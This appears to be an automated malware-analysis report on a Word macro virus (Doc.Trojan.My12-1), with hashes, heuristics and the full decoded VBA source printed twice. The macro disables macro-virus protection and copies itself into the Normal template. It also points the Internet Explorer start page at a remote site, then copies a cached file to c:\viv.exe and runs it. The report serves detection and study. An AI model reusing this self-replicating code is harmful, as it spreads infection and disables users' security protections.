Office (OLE) malware analysis — malicious · fe8b89e75027fe55

MALICIOUS

Office (OLE)

28.0 KB Created: 2002-08-22 02:47:00 Authoring application: Microsoft Word 9.0 First seen: 2015-10-01

MD5: d0f76562990783e322aa1db70e495390 SHA-1: d0ce1773bf95a5fb62d322d063c8428e46f71a24 SHA-256: fe8b89e75027fe5503ea74b05f31123d31a4f6fcd4ecdaa523a0d1928d0124c0

210 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1566.001 Spearphishing Attachment

The sample contains VBA macros that attempt to disable macro virus protection and replicate themselves to the Normal template, indicating self-propagation and evasion. The script also modifies the Internet Explorer start page to 'http://my12.narod.ru/www.htm', likely to redirect the user to malicious content. The presence of a 'Document_Open' macro and the ClamAV detection 'Doc.Trojan.My12-1' strongly suggest malicious intent.

Heuristics 6

ClamAV: Doc.Trojan.My12-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.My12-1
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
RetVal = Shell("command.com /c dir/a/b>c:\12.txt c:\windows\tempor~1\content.IE5\", 0)
```
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
Application.Options.VirusProtection = False
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://my12.narod.ru/www.htm� In document text (OLE body)
- http://my12.narod.ru/www.htmIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1972 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1972 bytes
SHA-256: `eb1f9e9155a07ad7006984d9d9f735e10467ea04477517d2f8e27e5c253b84d7`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True '<-signature string Private Sub Document_Open() On Error Resume Next Application.Options.VirusProtection = False Set x = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule Set y = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule If x.Lines(1, 1) <> "'<-signature string" Then x.DeleteLines 1, x.CountOfLines End If If x.CountOfLines = 0 Then x.InsertLines 1, y.Lines(1, y.CountOfLines) End If NormalTemplate.Save If y.Lines(1, 1) <> "'<-signature string" Then y.DeleteLines 1, y.CountOfLines End If If y.CountOfLines = 0 Then y.InsertLines 1, x.Lines(1, x.CountOfLines) End If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page") = "http://my12.narod.ru/www.htm" Dim RetVal RetVal = Shell("command.com /c dir/a/b>c:\12.txt c:\windows\tempor~1\content.IE5\", 0) For I = 1 To 10000000 Next I Dim SourFile, DestinatFile SourFile = "c:\12.txt" DestinatFile = "c:\123.txt" FileCopy SourFile, DestinatFile Dim MyString Open "c:\12.txt" For Input As #1 Open "c:\123.txt" For Output As #2 Do While Not EOF(1) Line Input #1, MyString Debug.Print MyString Print #2, "C:\Windows\Temporary Internet Files\Content.IE5\"; MyString; "\web31[1].avi" Loop Close #1 Close #2 Dim TextLine Open "c:\123.txt" For Input As #1 Do While Not EOF(1) Line Input #1, TextLine Debug.Print TextLine Dim SourceFile, DestinationFile SourceFile = TextLine On Error Resume Next DestinationFile = "c:\viv.exe" FileCopy SourceFile, DestinationFile Loop Close #1 Kill "c:\12.txt" Kill "c:\123.txt" Dim MyAppID MyAppID = Shell("c:\viv.exe", 0) AppActivate MyAppID End Sub

SHA-256: eb1f9e9155a07ad7006984d9d9f735e10467ea04477517d2f8e27e5c253b84d7

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'<-signature string
Private Sub Document_Open()
On Error Resume Next
Application.Options.VirusProtection = False
Set x = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
Set y = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
If x.Lines(1, 1) <> "'<-signature string" Then
x.DeleteLines 1, x.CountOfLines
End If
If x.CountOfLines = 0 Then
x.InsertLines 1, y.Lines(1, y.CountOfLines)
End If
NormalTemplate.Save
If y.Lines(1, 1) <> "'<-signature string" Then
y.DeleteLines 1, y.CountOfLines
End If
If y.CountOfLines = 0 Then
y.InsertLines 1, x.Lines(1, x.CountOfLines)
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page") = "http://my12.narod.ru/www.htm"
Dim RetVal
RetVal = Shell("command.com /c dir/a/b>c:\12.txt c:\windows\tempor~1\content.IE5\", 0)
For I = 1 To 10000000
Next I
Dim SourFile, DestinatFile
SourFile = "c:\12.txt"
DestinatFile = "c:\123.txt"
FileCopy SourFile, DestinatFile
Dim MyString
Open "c:\12.txt" For Input As #1
Open "c:\123.txt" For Output As #2
Do While Not EOF(1)
    Line Input #1, MyString
    Debug.Print MyString
Print #2, "C:\Windows\Temporary Internet Files\Content.IE5\"; MyString; "\web31[1].avi"

Loop
Close #1
Close #2
Dim TextLine
Open "c:\123.txt" For Input As #1
Do While Not EOF(1)
    Line Input #1, TextLine
    Debug.Print TextLine

Dim SourceFile, DestinationFile
SourceFile = TextLine
On Error Resume Next
DestinationFile = "c:\viv.exe"
FileCopy SourceFile, DestinationFile

Loop
Close #1
Kill "c:\12.txt"
Kill "c:\123.txt"

Dim MyAppID
MyAppID = Shell("c:\viv.exe", 0)
AppActivate MyAppID
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.